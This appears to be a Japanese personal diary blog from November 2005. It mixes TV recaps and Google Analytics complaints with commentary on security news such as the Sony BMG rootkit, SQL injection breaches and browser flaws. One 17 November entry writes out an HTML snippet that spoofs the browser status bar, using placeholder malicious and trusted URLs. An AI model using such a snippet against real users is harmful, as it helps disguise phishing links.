実際にマルウェアに悪用され始めた“ファイルやプロセスの隠蔽機能”については、* 無効化するパッチの提供
もはじめているようですね。 事後の対応はなかなか。[雑談] * マトリックスレボリューションで出てきた二足歩行機械を自作 (GIGAZINE)
```textile映画で出てきたのはコレ
上記にあこがれを抱き、完成させたのがコレ
```た、確かに何か間違ってるとしか思えない・・・。w[雑談] * 地球上から肥満体が消える日が来る? 食欲抑制ホルモン“オベスタチン”発見される (なんでも評点)
textileホルモン投与で、肥満を解消できる時代が到来するかもしれない。米国スタンフォード大学の研究チームが新しいホルモンを発見した。食欲を抑制するホルモンである。このホルモンを投与されたラットは、食欲が半分に減り、体重が減少する。このホルモンは、“Obestatin”と名づけられた。
『* クリムゾンの迷宮
』 の “FSビスケット” を思い出しました。 恐ろしい副作用とかなけりゃ良いけど。

2005/11/13(日)日曜日ー。(仮面らいだー?)

[雑談] 護身術世の中には、色んな護身術があるもんなんですね・・・。
textile**北龍拳**仮面ライダースーパー1の武術指導を行なった故龍 明宏老師の武術をベースにした拳法です。
痴漢に襲われた女の子が、突然、仮面ライダーの変身のポーズ! それを見た痴漢があきれてたじたじになって逃げ出す!! ・・・という護身術では無いらしい。(←当たり前だw)[雑談] * 「お騒がせしてすみません」――生協の白石さんサイン会 (ITmedia)
textileネット発のベストセラー「生協の白石さん」のサイン会が、東京農工大の学園祭で行われた。たくさんのファンを前に白石さんは終始恐縮しっぱなしだった。
サインは、「ひとことカード」にしてくれたらしいですw 正体がバレてしまっても人気継続なのね♪[動物] * こねここぶろぐ
  • ずきんさん
のとこにありました。 見てると幸せな気持ちになれます。 うにゃ〜。[雑談] mixiのあいのりコミュで
  • MIEもタレントだった
という話題が出ていた。 ま、良いぢゃない。 MIEの場合は、* 前から番組中でもタレントだって言ってた
し、そんなにすぐに目くじら立てて騒がなくても・・・。 私はあいのりが好きです。 もっとほんわかと楽しみながら見ましょうよぅ。

2005/11/14(月)月曜日ー。(ちゃんとエンコードしなきゃね。。。)

[便利] * Google、アクセス解析サービスを無料に (ITmedia)
```textile米Googleは11月14日、企業がオンラインマーケティングキャンペーンの効果を追跡できるホスティング型Web解析サービスを無料で提供すると発表する。このサービス「* Google Analytics
」は誰でも無料で利用でき、月間500万PV(ページビュー)の上限がある。```
  • 葉っぱさん
や* ずきんさん
のところにあったので、さっそくココにもタグを入れてみました♪ サイトのトップページにタグが入ってない限り、インストールが確認できませんのエラーが出続けるのね。(^-^;・・・いつの間にか Google がサイトの Cookie をどこかに送信し始めたり、ページを JavaScript で書き換えはじめても誰も気づかないんだろうなぁ。 それに、http://www.google-analytics.com/urchin.js が改ざんされたら世界中のページが改ざんされたりw 恐ろしい。(と言いつつ使ってみたりw) 最初の結果が見れるようになるのは、12時間後のようです。[出来事] * ネット商店“身内”不正アクセス、個人情報盗む (読売)
まーさんが* openmyaMLに投げて
ました。 例の、「会社のパソコンに不具合が起こり、(IDなどを知っている役員らが)代わりに自分のパソコンを使った際、入力されたIDなどが残っていた」という説明は、真っ赤なウソだったそうです。(^-^;
textile実際はセ社社員当時、両サイトのサーバーにアクセスできるIDやパスワードのセキュリティー(安全性)対策を徹底するため、「パスワード管理ソフト」を導入するよう進言。このソフトの悪用を思いつき、管理ソフトを丸ごと自分のパソコンにコピーし、IDやパスワードを盗み出していたという。
この手のツールを使うときは、ちゃんとパスワードの設定(&それにより適切な暗号化が行われること)が必要ですね〜。 適切なエクスポートの手順を経ずにデータだけコピーされた場合に備えて、マシン固有の値(WindowsシリアルIDとかMACアドレスとか?)が暗号化キーに盛り込まれてたりするツールもあるんじゃないかな。 (・・・ほんとに守ろうと思ったらTPM対応?w)[雑談] * 銀座の中心で愛を叫ぼう!! (ExciteBit)
銀座のビルの谷間に、縁結びの神社があるそうです。 (い、行きませんよ?w)[雑談] * 電話相手の「快・不快」を解析するシステム (/.jp)
電話の音声から、相手の「快」「不快」といった感情を解析してくれるシステムだそうです。 最初の動作試験は、やっぱり、罪の無い後輩くんに電話して けちょんけちょんにいぢめて、「不快」が出るかどうか確かめる、とかなのかな。(ぇw関連: * 感情解析システム「コミュニケータプラス」 (メッセージワン)
[出来事] * Oak Lawn High suspends hackers (Chicago Tribune)
シカゴにある高校(Oak Lawn High School)の生徒3人が、学校のコンピュータに侵入して、自分たちの成績を不正に改ざんしていたことが分かったそうです。 生徒たちは10日間の停学&改ざんされた成績は無効になったようです。 映画『ウォーゲーム』ですか?w 次は、軍のコンピュータに侵入して、えんえんと3目並べをするハメになるんでしょうかねw[雑談] * [connect24h:10000] Re: VS 2005のExpress Editionは事実上,無償提供へ
connect24h-ML、10000通超え、おめでとうございま〜す。(^-^)(openmyaML に慣れちゃうと、祭りが起こらないのが、なんか不思議に思えたりw)[TV][あいのり] #292 Dancing All Nightウクライナ横断中。 黒海に面した港街『オデッサ』のあたり。やじるし: ヒデ->アヤ<=>嵐。 tk->MIE->スーザン。 梅ちゃん。オープニングで、アヤが子猫抱いてた・・・。 可愛かった〜wヒデがアヤの服をプロデュースしたいと言い出す。 アヤ、しぶしぶ承諾。アヤの日記“嵐に誤解されてしまいそうで不安”案の定、嵐に、ヒデの服だと見破られてしまい、嵐、ショック。スーザン「これ、ヒデの?」アヤ「いや!私の。私の・・・」嵐“ヒデの服ですかね、気付きますよ、それは。結構、辛かったですね。ヒデの事好きなんじゃないかなっていうのが純粋に思いました” MIEが自分のことを好きだと勘違いしていたtk、誤解に気づく・・・。tk“残酷っすね。MIEはもちろん俺・・・だなとか思ってたじゃないですか。だから、凄いショックだったというか。後は俺って、あいのり始まってから1回も誘われた事ないんですよね” スーザンが恋愛しているかどうか、本人から聞きだそうとするMIE。スーザン「恋愛みたいなのがね。出来にくくなってる」MIEの日記“恋してないって聞いて淋しい気持ちになった。MIEは恋愛対象外ってことかな”MIEのことを諦められないtk、もう一度 素直な気持ちをMIEにぶつける。tk「なんか、オレ今までさ女の人をこう尊敬して好きになった事がないのね。だから今は本当、人間的な魅力に惹かれて好きになってくって付き合い方をさ求めてたの。でオレは本当に見つけた・・・その人を」MIEの日記“tkのストレートな気持ちにドキッとした”野外ディスコで(ヤケ酒を?)飲みすぎた嵐、アヤに酔った勢いで告白してしまう。(ばかー!)嵐「ホント(アヤのこと)好きなの。言っていいかわからないけど」アヤ「言っちゃダメだって!どうした?嵐〜!しっかりして〜!」嵐から、ルール違反の告白を受けたアヤ、若干嬉しくも思っている。アヤ“酔っ払ってて勢いに任せて、言っちゃったみたいな。最低最悪です。本当に。もう・・・いやでも本当、有り得ないとか言いつつも、本当純粋にそこだけを考えたら・・・嬉しかったです”しかし、その翌日、前の日のことをまったく覚えてないという嵐に、アヤは・・・。アヤ“私だけ憶えてるから、ちょっと馬鹿みたいだなって思いました。不公平ですよね。だから、本音の部分を多分聞けて嬉しいはずなのに嬉しくない・・・”そしてこの日から、アヤは嵐に対して・・・心を閉ざしてしまう。 来週は、アヤ・MIEを巡る矢印に変化? tkが緊急入院? そして告白??!⇒* 今週のあいのり
、* あいのりウラ話(アヤの日記)

2005/11/15(火)火曜日ー。(ドラマ+空港シーン=テレコムセンターw)

[雑談] Google Analyticsインストールが正常に終わったと表示されてから、すでに18時間はたっていると思うが、未だに、
textileデータの待機中 Analytics を正常にインストールし、データの収集を開始しました。 最初のレポートは 12 時間以内に表示できます。
というメッセージが表示され、訪問者数0のグラフが出ている。 もし仮に私以外の誰もこのサイトを見てないとしても、私の分のカウントが上がってもよさそうなものですし、うーん、何だかうまく動いてないっぽい? (ちなみに exclude は設定してませんが。)**[21:00追記]** もう設置してから24時間以上経過してますが、表示できませんねー。 俺だけなのかな? 表示されない場合のお問い合わせ先のリンクがあるのですが、リンク切れだし。 がっかり。[雑談] * ディズニーランドのキャストだけど質問受け付けるよ?
ディズニーランドの従業員さんによる、中の人の事情が色々出てます。 一度読むしか♪[セキュリティ] * Mailman Attachment Filename Scrubbing Denial of Service (Secunia)
UTF-8 な添付ファイルを含むメールの処理でサービスが停止してしまうそうです。[雑談] * 今年の言葉は「郵政民営化」 ワード・オブ・ザ・イヤー (asahi.com)
textile「郵政民営化」は投票総数の4分の1以上を占めた。2位は「刺客」、3位は「想定の範囲内」、4位は「インスパイヤ」、5位は「小泉チルドレン」で、総選挙に関連した言葉が多かった。
私てきには、やはり、「想定の範囲内」のインパクトが大きかったかなぁ。(^-^;[セキュリティ] * Unicodeバグについて
佐名木さんが connect24h-ML に投げていました。 読まないといけない予感。 メモ。[雑談] * ヤフー、航空写真地図に参入 Ajaxでスクロール (ITmedia)
ニュースサイトなどで話題になっているせいか、今は若干動作が重いですかねー?[出来事] * サービスの設定ミスで会員1518名がSasser感染 (ITmedia)
textile@niftyが提供しているマネージド型のセキュリティサービス「常時安全セキュリティ24」の一部機能が正常に働かず、会員1518名のPCがワーム型のウイルス「Sasser」に感染した。
メンテナンス作業で設定に不備が生じて、その結果、不正侵入防止機能が約24時間、停止してしまっていたそうです。 ・・・それにしても、24時間停止で1518名感染って。 こういう便利な(?!)サービスがあると、それに安心して完璧に依存してしまうユーザが出るってことですな。(^-^;関連: * 「常時安全セキュリティ24」一部機能の不具合によるサービス利用者間のパソコンでのウイルス感染と今後の対応について (@nifty)

2005/11/16(水)水曜日ー。(あー、つかれた。)

[雑談] 疲れた。製品Aの検証 ⇒ 製品Aの開発元にメール ⇒ 製品Bの検証 ⇒ 製品Bの開発元にメール ⇒ 製品Aの開発元から返事 ⇒ 製品Aの再検証 ⇒ 製品Aの開発元にさらにメール ⇒ 製品Bの開発元から返事 ⇒ ・・・ を延々と繰り返してましたw 製品Aと製品Bがまったく逆の性質を持つ製品(矛と盾みたいなw)なので、頭がパニックw しかも、これらの合間に、OJTだ、ミーティングだ、別案件の報告書チェックだ、明日の客先訪問の準備だ、と色々と。 1つのめちゃ忙しい案件にどっぷり入るのも疲れますが、たくさんあるのもヤダかも。 頭の切り替えが遅いのかなぁ、私。[雑談] Google AnalyticsGoogle のサポートにメールが通じました。(定型文っぽいですがw) 「本件につきましては、現在弊社にて一部のお客様に遅延が発生していることを確認しており、鋭意復旧作業に努めております。」とのことです。 「データの待機中」エラーは相変わらず表示されるのですが、とりあえず、一昨日時点くらいのデータについてはグラフ表示できるようにしてくれたようです。 ちゃんと動くようになるのは、もうしばらくかかるようですかね〜。(^-^;[セキュリティ] * 2005年のキーロガー攻撃、65%増加 (ITmedia)
キ、キーロガー攻撃?! ・・・攻撃なのか?w (なんか違和感のある言葉〜。)[出来事] * サイボウズ、サイト一時停止の調査結果「不正アクセスはなかった」 (CNET)
を。 調べてみたら何もなかったんだそうです。 そんなことありえるのね。(汗
textileサイボウズでは、ウェブサーバの動作がおかしかったためにチェックツールで調査したところ、「rootkit」が埋め込まれている可能性が非常に高いとの結果が出たため、
なぜウェブサーバの動作がおかしかったのかとか、なぜチェックツールはそんな誤報(?)を吐いたのかとかが気になりますね〜。 どんなツール使ったんだろう?関連: * 弊社サイトへのアクセス障害について - 調査結果 (サイボウズ)
[雑談] * 迷惑は体験させてやる (大学教員の日常・非日常)
メールのエチケットを学ばせる効果的な方法です?! (ネタ元: * hard で loxse な日々
)[雑談] * Google Baseのβ版、公開される (ITmedia)
textileGoogleの噂のオンラインデータベース「Google Base」のβ版が公開された。テンプレートが用意されているほか、利用者が自分で項目を設定することもできる。
どんなものになるんだろう? ものすごく混沌とした状態になりませんかね? あまりに情報が多いと検索もしにくいんだろうし、そのうちspam広告的なエントリが増えたりして・・・? (それとも、Wikipedia みたいに成功するんだろうか。)

2005/11/17(木)木曜日ー。(野ブタ。のってセカチューのどのへんに出てました?)

[雑談] Google Analytics![](/image/mng200511162215_miyagi.gif) 
  • Google Analytics
で、3日前くらいのデータだけは表示できるようになったので、例の、アクセス元を世界地図にプロットする機能、試してみました♪ ま、このサイトの場合、案の定、アクセス元は日本ばかり(笑)なのですが、1つだけ、日本から離れた位置に印が! 鹿児島と台湾の中間地点くらいの場所です。 どこかなー?と思いながら、マウスカーソルを合わせてみると・・・Japan-Miyagi と表示されました。 ふーん、宮城県ってこんな場所にあったんだ〜。(ぇw[セキュリティ] * IEやOperaにステータス・バーを偽装できる問題 (IT Pro)
textileデンマークSecuniaは現地時間11月16日,Internet Explorer(IE)やOperaにステータス・バーを偽装できる問題(弱点)が見つかったことを明らかにした。スクリプトを使わずに,画像に張られたリンク先を偽装できる。
非常に単純・・・。(^-^;<form action="悪意あるサイトのURL"><a href="信頼されるであろうURL"><input type="image" src="画像ファイル"></a></form>関連: * Internet Explorer Image Control Status Bar Spoofing Weakness (Secunia)
、* Opera Image Control Status Bar Spoofing Weakness (Secunia)
[出来事] * ソニーBMG、「rootkit」CDのリコール発表--別のセキュリティ問題も発覚 (CNET)
textileソニーBMGは米国時間15日、数百万枚のCDをリコールすることを明らかにした。これらのCDをPCで再生すると、そのコンピュータに深刻なセキュリティリスクが生じる可能性がある。
例のrootkitの話以外にも、別種のセキュリティ問題が存在していたとのことで、とうとう回収騒ぎにまで発展してしまったようです。(^-^;[セキュリティ] * テキスト・ブラウザ「Lynx」に危険なセキュリティ・ホール (IT Pro)
昔は、よくlynx使ってたけど、最近はなんとなくw3mかなぁ。(ぇw
textileテキスト・ベースのWebブラウザ「Lynx」に危険なセキュリティ・ホールが見つかっている…。細工が施されたリンクなどをクリックすると,任意のコマンドやローカルのプログラムを勝手に実行させられる。対策はアップグレードや設定変更。
URIハンドラ「lynxcgi」の取り扱いに問題があり、HTMLのリンクを用いて任意のコマンドライン引数を指定できてしまい、結果として、リンクをクリック⇒OSコマンドの実行が行われてしまうとの問題だそうです。関連: * Multiple Vendor Lynx Command Injection Vulnerability (iDefense)
[雑談] およ?Google Analytics にログインできない?(^-^;ログイン成功後に、http://www.google.com/ に転送されちゃうみたい。[雑談] * あなたのサイトをGoogleはどう見てる?--Googleサイトマップ日本語版が登場 (CNET)
textileGoogleサイトマップは、ユーザーが自分のサイトをGoogleクローラの巡回対象として登録できるサービス。すでに巡回対象となっているサイトでも、最新の更新情報をGoogleに送信できる。
とりあえず、URL だけ並べた XML を作って登録してみた。 あまり面白くないな。(ぇw[出来事] * 【続々報】サイボウズのWebサイト停止はツールの誤検知が原因 (IT Pro)
textile同社はオープンソースのrootkit検出ツールである「chkrootkit」を使用している。10日18時ごろ、同ツールがrootkitがある可能性が極めて高いと検出したため、サイトを停止した。
昨日、* 何のツールだろ?20051116#p04
と話してましたが、これ、「chkrootkit」の誤報だったそうです。[雑談] * GoogleのWeb解析サービス、あまりの人気にトラブル (ITmedia)
textileGoogle Analyticsではスタート直後、需要が高いあまりに登録できない、ログインできない、動作が遅いといったトラブルが発生した。今でもパフォーマンスは標準以下のようだ。
さっき、Googleサイトマップ には、登録&ログインできましたが、Google Analytics には、相変わらずログインできないなぁ。 トップページに飛ばされちゃいます。**[追記]** * いきなりつまずいた「Google Analytics」--既存顧客へのサービス中断 (CNET)

2005/11/18(金)金曜日ー。(なでなで♪)

[雑談] ナデナデ@miximixi で “なでなで” 好きのためのコミュニティを見つけましたw コミュニティの写真が、猫をなでなでしてる写真だったもので、思わず入ってしまったり。(^-^;[雑談] * お姉さんの「男の恋愛相談室」
  • ずきんさん
に推薦してもらった(笑)ので、メモ♪
textile女の子にモテたい! 男のための HOW TO コミュニケーション BLOG。お金を使わなくても会話とサービスで女心をキャッチしろ!
というサブタイトル。(汗  私は、別にモテなくて良いから、普通に1人の彼女が欲しいですw[雑談] * USBクリスマスツリー「線上のメリークリスマスV」新発売 (e-LET'S)
textile「線上のメリークリスマスV」はUSB電源により、LEDの点滅に加えモーターブロワーの送風で、発泡スチロールの雪を透明ドーム内に降らせます。昨年同様ボリュームによる音量の調節と雪の吹き量のコントロールが可能で、マスコットは“トナカイとサンタ”となっております。
そ、そうか。 もうそんな季節か。 今年も・・・。(以下略。)[製品] * 防水ステンレスキーボード“頑丈打” (NIPPON STYLE PROJECT)
textile動画を見て頂ければ一目瞭然、コーヒーカップはおろか、コーヒーサーバーに襲撃されても全然平気、「防水ステンレスキーボード”頑丈打”」と、トラックボールで驚きの防水性能を実現した「ステンレストラックボールマウス”頑丈丸”」の登場です。
なんか、見た目、ちょっと打ちにくそう? ふつうのキーボードカバーじゃダメなんかな?w関連: * コーヒーをこぼしても平気なキーボード「頑丈打」 (/.jp)

2005/11/19(土)土曜日ー。(ごめんね。)

[セキュリティ] * アップルの「iTunes」に深刻な脆弱性--マシン乗っ取りのおそれ (CNET)
textileAppleの音楽管理ソフト「iTunes」の一部のバージョンに深刻な脆弱性が見つかった。この脆弱性を悪用されると、攻撃者にリモートからコンピュータを乗っ取られる可能性があると、あるセキュリティ調査会社注意を呼びかけている。
対策が出るまでの間は、詳細は公表されません。オリジナルアドバイザリには、問題があるのは「All Microsoft Operatins Systems」と書いてありますね。 eEye が最初間違って「all operating systems」に影響があるとしてアドバイザリを発行していて、それに基づいて記事が出てしまったということらしいです。 しかしながら、eEye、その後、本当に Mac版にも問題点を発見し、現在、調整中のようです。(?)関連: * EEYEB-20051117b (eEye)
[雑談] * キッズ・パトロール - ネチケットについて (警察庁)
高木先生のところに、『* 「どうしよう…あんなメール出さなければよかった…」「なんとかメールを取り戻してみよう!」と、 4つの「ISP」のうちいずれか2か所の「パスワード」を素早くクラックしてメールを奪回するという、子供向け教育ゲーム(警察庁ご謹製)
』として紹介がありました。 た、確かに、何であえてこの部分をゲーム化したのかな。 子供達をヘンな方向に誘導していると誤解されても仕方がないような。(^-^;  ちなみに、ゲームにクリアすると、
textileメールを取り戻すことができたね! でも本当は、一度送ってしまったメールは、ゲームみたいに取り戻すことはできないんだよ〜!
と表示されますが、フォローになってないと言うかw  そもそも何で2箇所に入らないといけないんだろう?(ぇw[雑談] * 女の子を直ぐ「その気」にさせる鼻スプレー登場 (AZOZ)
なーんて記事をここに載せたりすると誰かからツッコミが入るんだろうか?w  使いませんよ!?w[セキュリティ] * 第2回 誰でもWeb管理画面に入れる気前のいい会社 (@IT)
はるぷさんのイラスト付きの第2話が公開されました♪(^-^)読んでいて、一瞬、最後の “星野君「町田さん、ちょっとWeb管理ツールにログインできるか試してもらっていい?」” の部分が何かのネタフリかと考えてしまった。(←気のせいw)[出来事] * ワコール、不正アクセスで顧客情報4700件流出・カード悪用も (日経)
textileワコールは19日、外部からの不正アクセスにより、インターネットで運営するオンライン・ショッピングサイトの顧客データ約4700人分が流出したと発表した。うち約1900人分にはクレジットカード情報が含まれる。「勝手にカード番号を使われた」との訴えが10件寄せられており、京都府警に報告した。
外部からの不正アクセスが原因だそうです。 氏名や購入履歴については流出はないとのことです。 (もしかして、また、SQLインジェクションでしょうかね?)関連: * お客様情報の流出に関するお詫びとご説明 (ワコール)

2005/11/20(日)日曜日ー。(本ずわいがにのクリームソース仕立て。)

[雑談] * あなたの脳タイプ診断 ビジネス編 (PASSPAL)
  • palm84さん
のところにありました〜。
textileあなたの頭脳タイプ  <Bb型> 理論派分析タイプ数学に強く、これをキッチリ理論的に組み立てていくことに能力を発揮するあなたは、当然理科系の仕事に向く頭脳の持ち主です。したがって正しい分析と確かな見通しを求められる職業にあなたの能力は発揮されます。[相性判断]◇あなたがあなたらしく成功するためには、会社やお店のためになる意見を述べていくことです。信頼を受けることでしょう。Ab、Ca、Cb、Cc、Dbの上司の元がよいですね。●あなたの知能活動(どのように頭を働かせるか)  『集中思考型』 論理的で推理する力に優れています。 複数の記憶または情報から一つの新しい結果を導き出せる論理性の高いタイプです。
私、実は数学がニガテだったりw  上司との相性かぁ。 上司にもこれ受けさせないと?w[出来事] * Google Baseに脆弱性、現在は修正 (ITmedia)
textileβ版が公開されたばかりのGoogle Baseにクロスサイトスクリプティングの脆弱性が存在し、cookieなどの情報を盗み出せる状態になっていた。…この記事についてGoogleに電話でコメントを求めたが返事はなかった。
電話したけど返事が貰えないってどういう状況だろう?w[雑談] Google Analytics今日になって、「The demand for Google Analytics surpassed even our highest expectations and as a result some customers may temporarily experience report-update delays. All data continues to be collected and no data has been lost. We are currently adding resources to ensure high-quality service. We apologize for any inconvenience.」というメッセージが表示されるようになりました。 私のところは、一応、1日半くらい遅れてはいますが、データの表示は出来てます。(あいかわらず、日本地図の都市のプロットがいい加減で、沖縄付近に、Japan-Ishikawa とか Japan-Minami とか出てますがw)(Minamiってなんじゃい? ・・・大阪かな?(違)[TV] ぷっすま今週の ぷっすま のビデオを見ていたら、DON'T OVER で、秋葉原の cafe&kitchen「Cos-Cha」というメイド喫茶に行っていました〜。 なるほど、こういう雰囲気なんですね。(汗[TV] 正直しんどい「知ったか☆デート」のお相手になっている理知的な女性は、* 土肥美緒さん
という方らしいです。モテモテ暗記ワード(笑)で出ていた、気になる名言:
textile「恋愛はポタージュのようなもの。初めの数口は熱すぎで、最後の数口は冷めすぎ」 フランスの女優、ジャンヌ・モローの名言。
[製品] * 背伸びしたいお年頃?――タカラの“女の子向けMP3プレーヤー” (ITmedia)
textile中身は一般的なMP3プレーヤーと変わりません。複雑になる部分を削ぎ落とし、パソコンが使えなくても楽しめるオーディオプレーヤーにしました。
子供向けに構成されたMP3プレーヤーだそうです。 価格は 9,975円とのこと。[雑談] * 体が肥大化する奇病相次ぐ 原因はキノコか (虚構新聞社)
な、なつかしい?w  ゲームなら良いけど、こうして記事になるとなんか怖いですねw[雑談] * 最も幸せな日本人像は 30代、都会暮らし、専業主婦 (産経)
30代、都会暮らしの主婦が一番幸せを感じているそうです。 非喫煙者で専業主婦の方がより高いらしい。 年収は、1500万円を超えると不幸せになるようなので、ご注意を。(ぇw[雑談] * [FreeBSD-users-jp 88056] 生協の白石です
しょーたくんのところで見つけました。 白石さんを騙ったspamメールだそうです。(^-^;

2005/11/21(月)月曜日ー。(検証、検証、検証、...)

[出来事] 東証,名証それぞれのシステムダウンの原因
  • 東証ダウン、真の原因はプログラムの破損 (IT Pro)
textile東証の売買システムはCOBOLで記述されており、富士通のメインフレーム上で稼働する。そのCOBOLプログラムを構成するサブモジュール間の「呼び出し関係」が、10月31日夜に行われた月次処理の際、何らかの理由で破損したと見られる。
「コンデンス」と呼ばれる、パソコンで言うところの「デフラグ」みたいな処理が原因で、モジュール間の呼び出し関係が破損してしまったんだそうです。
  • 名証システム障害、原因は外注先オペレータの“操作ミス” (IT Pro)
textile障害発生直前の営業日(11月2日)の午後6時ごろ、取り引き終了に伴い、オペレータは相場報道システムのデータベース(Oracle)のデータをバックアップするために、相場報道テーブルをエクスポートした。その後、本来ならバックアップ媒体に保存するコマンドを実行するところを、オペレータはエクスポート処理を再度実行した。操作ミスに気付いたオペレータは、エクスポート処理を2.8秒後にキャンセルし、保存コマンドを実行した。
1.「制御テーブル」と呼ぶファイルをリネーム 2.データを退避 3.再び制御テーブル名を元に戻す という手順で進む「エクスポート処理」をあわてて中途半端にキャンセルしたことが原因だそうです。(2.8秒後にキャンセルとかって良く分かりましたね。 ログがしっかりしてるのね。)[出来事] * SONY BMG、「MediaMax」アンインストーラ問題でさらなる深みへ (ITmedia)
textileSONY BMGがコピー保護ソフトウェアを削除するために配布しているソフトウェア自体に、新たな問題が発見されたとセキュリティ研究者が指摘している。…Secuniaは…危険性を「非常に重大」と評価しており、ハッカーはユーザーを不正Webサイトに誘い込み、この脆弱性を利用してアンインストーラが使われたマシンを乗っ取ることが可能だという。
あー、踏んだり蹴ったり。(ぇw  このアンインストーラーは ActiveX で書かれているようですが、1度でも使用したことがあるユーザが、別の悪意あるWebサイトを閲覧した場合に、任意のファイルをダウンロードさせられたり、コマンドを実行されたりする恐れがあるようです。 * 発見者のページ
に このアンインストーラーのアンインストール方法(^-^;が書かれています。関連: * Sony CD SunnComm MediaMax Uninstallation ActiveX Control Vulnerability (Secunia)
**[追記]** * rootkit入り音楽CD――それでもコピープロテクトはなくならない (ITmedia)
[雑談] * 「史上最悪のソフトウェアバグ」ワースト10を紹介(上)
、* (下)
トップ10の内容はともかくとして、
textile史上初のコンピューター・バグは1945年、『ハーバード・マーク2』のFパネルの70番リレーに虫が挟まった時にまでさかのぼる。乗算器と加算器のテスト中、異常に気づいた技術者が、この部分に蛾が挟まっているのを見つけたのだ。原因となった蛾は、「バグ(虫)が実際に見つかった最初のケース」との説明文とともに、業務日誌にテープで貼り付けられた。
というのが一番興味深かったかも。 そんな歴史があったんですね。(^-^)[雑談] * オープンソース化に天気予報……企業/個人に対する政府のセキュリティ戦略 (MYCOM PC WEB)
「情報セキュリティの日」とか「情報セキュリティ天気予報」とか何だか気になるキーワードが。[雑談] * 理系のための恋愛論 第192回 ライバルの悪口はカッコ悪い
textile「ニブいなあ。ホント、気付いてないの? あの人、Cちゃんが好きなんだよ。ふだん、あんまり参加もしないのに、急にオレ連れてきて合宿に行くとかいい出したから、あせっちゃったんじゃないの?」というのです。本当にビックリして声も出ないCちゃんなのでした。
私もビックリですw うーむ、完璧に逆効果と言うかなんと言うか。 私もそういう立場になったら、そんな行動取ってしまうんですかねー? (冷静な判断ができない状況なのかな。)[雑談] Google Analytics![](/image/img200511211804_googleanalytics.PNG) 今まで、どうにか1日半遅れくらいで、グラフ表示してくれてた Google Analytics ですが、とうとう先週の金曜日を最後に、グラフが更新されなくなっちゃいました。(^-^;すでに3日目〜。 がんばれー、Google![雑談] * 電子メールに迫る検索エンジン (ITmedia)
textileこれまで「最も多いネット活動」の座を占めてきた電子メールだが、この1年で検索エンジンが急速に追い上げてきている。
今では、ほとんどの人はインターネットを巨大な図書館と考えている、とw関連: * PEW INTERNET の調査報告書
**[pdf]**[TV][あいのり] #293 テンション・ブッキブキ!!ウクライナ、「黒海の真珠」と呼ばれる街 オデッサのあたり。やじるし: ヒデ->アヤ<=>?嵐。 tk->MIE->?スーザン。 梅ちゃん。先日の嵐が酔っ払って気持ちをしゃべってしまった事件以来、嵐と距離をとり始めるアヤ。 嵐の目の前で、ヒデと一緒にゴーカートに乗る。 嵐、落ち込む。嵐のパワーUPノート「行きづまりをきりひらくにはあえて失意のどん底に落ちるべし」スーザンが好きなMIEだが、スーザンがまったく振り向いてくれるそぶりがなく、いつも素を出して話ができるtkの存在を意識し始める。MIEの日記“ほんまに素のトークができるtkみたいな人を好きになれたら幸せなんだろーなと思った”そして、絶妙のタイミングでtk、ウイルス性心筋炎にかかり、緊急入院。MIE“tkが入院して凄いなんか、心配・・・。めっちゃ寂しいですよ。tkは大きい。すっごい大きい。”tkがいなくなって、初めてその存在感の大きさに気づく、MIEや他のメンバーたち。2日後、元気に退院してきたtkにメンバー安心。MIE「めっちゃビックリしたもん。急やったから。なんかワゴン6人やったらむっちゃ変な感じやったで。」MIEの日記“tkはかっこつけーだけどやっぱり一番落ち着く”『イワンクパル』という恋のお祭りに参加するメンバーたち。 女性陣が川の上流から花輪を流し、下流で男性陣が花輪を取る。 取れたら恋が実るらしい。アヤの花輪 ⇒ ヒデが取る。MIEの花輪 ⇒ 途中で沈むが、tkが探し出して取る。梅ちゃんの花輪 ⇒ 素通り・・・。 誰も取らない。 せつない・・・。(>_<)そして・・・tk、MIEに告白するチケットを貰いにワゴンへ!tk「オレにとってMIEは本当に必要な人。オレはMIEの事が好き。本当に好き、好きになった。だから俺と一緒に日本帰ろう。俺のやるべき事は全部やった。」MIE“tkと日本に帰っても何の違和感もなく付き合っていけると思うし、凄い楽しいと思う。MIEの中ではスーザンを諦めて帰る方が楽・・・凄い。tkをふって、こっちに残る方が過酷なんですよ、なんか。これからどうなるかわからへんし、う〜ん悩む。ホンマに悩む”来週は、告白の結果が! どうなるんでしょうかね。 どきどき。⇒* 今週のあいのり
、* あいのりウラ話(tkの日記)

2005/11/22(火)火曜日ー。(締め切りまぢか。)

[出来事] * Google Sitemapsに脆弱性が発見されるも修正済み (INTERNET Watch)
textile米Googleは18日、Google Sitemapsに脆弱性が存在することが発見されたものの、現在は修正済みであることを明らかにした。…発表によると、…確認プロセスにバグが存在していたため、第三者によってサイトの統計が閲覧できるというセキュリティ上の問題が発生していた。
まぁ、Google Sitemaps の画面は、他人に見られても問題ない内容だったような気もしますがw[出来事] ワコールの情報流出の原因は、SQLインジェクション。◆* Q. 不正アクセスの原因は何か?またいつ頃までに究明するのか? (ワコール)
textileA. NECネクサスソリューションズ株式会社の管理・運用するオンラインショップシステムにおいて今年8月にシステム変更を行いました。SQLインジェクションによる不正アクセスへの対策を行っているとの認識をしておりましたが、システムの一部に対策漏れがあることがこのたびの調査で判明しました。結果としてその対策漏れが放置されていました。現在、さらに詳細な原因の徹底究明に向けて対応中です。
FAQが改定され、当初は「不正アクセスに対する対策」と書いてあった部分が、「SQLインジェクションによる不正アクセスへの対策」に変わったようです。**[18:11追記]** IT Pro に記事が出たようです。 Thanks, 田中.ROMさん  ・* 手口はまたもやSQLインジェクション,ワコールオンラインショップへの不正アクセス (IT Pro)
[出来事] * ネットでテニスコートを不正予約 (日刊スポーツ)
caqさんの* openmyaMLへの投稿
で知りました。
textile今月、10人のうち一部がHP上の同システムの登録データを操作して予約記録を無断で書き込み、本来は1カ月前から予約可能になるテニスコートを、1カ月以上先まで「先取り」した。
hidden とか select の値を改ざんして登録した系のお話でしょうかね〜?
textile市は町田署に届けたが、手続きには正規のIDなどが使われているため不正アクセス禁止法違反などには問えないのが現状で、条例に罰則を設けるなどの改正を検討している。
あちゃー。 オオゴトになっちゃってますね。(汗  最初から強硬手段に出ずとも、対象者は分かってるんだから、まずは普通に本人に警告するだけで良いと思うんですけどもね。 不正アクセスじゃないし、金銭も絡んでないし、業務妨害でもないのだから。 頭に血が上っちゃったんですかね。(^-^;[セキュリティ] * IE に存在する未対応の脆弱性、概念実証コードが公に (Japan.internet.com)
  • openmyaMLで話題になっています
が、Internet Explorer に非常に危険な 0-Day が見つかりました。
textileWeb ブラウザ『Internet Explorer』(IE) の脆弱性で、Microsoft が未対応のものについて、悪用すればシステム乗っ取りの可能性があることを示す概念実証コードが公になった。
